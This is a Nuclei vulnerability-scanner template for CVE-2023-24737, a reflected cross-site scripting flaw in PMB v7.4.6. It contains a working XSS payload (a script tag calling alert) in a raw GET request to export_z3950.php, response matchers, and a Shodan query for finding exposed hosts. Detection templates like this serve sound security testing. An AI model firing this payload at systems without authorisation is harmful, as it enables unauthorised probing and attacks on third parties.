nuclei-templates/cves/2023/CVE-2023-24737.yaml

44 lines
1.1 KiB
YAML

id: CVE-2023-24737
info:
name: PMB v7.4.6 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
PMB v7.4.6 allows an attacker to make a Reflected XSS on export_z3950.php endpoint via the same query parameter.
reference:
- https://github.com/AetherBlack/CVE/blob/main/PMB/readme.md
- https://nvd.nist.gov/vuln/detail/CVE-2023-24737
- https://github.com/AetherBlack/CVE/tree/main/PMB
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-24737
cwe-id: CWE-79
metadata:
shodan-query: http.favicon.hash:1469328760
verified: "true"
tags: cve,cve2023,xss,pmb
requests:
- raw:
- |
GET /pmb/admin/convert/export_z3950.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '3@1=<script>alert(document.domain)</script>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200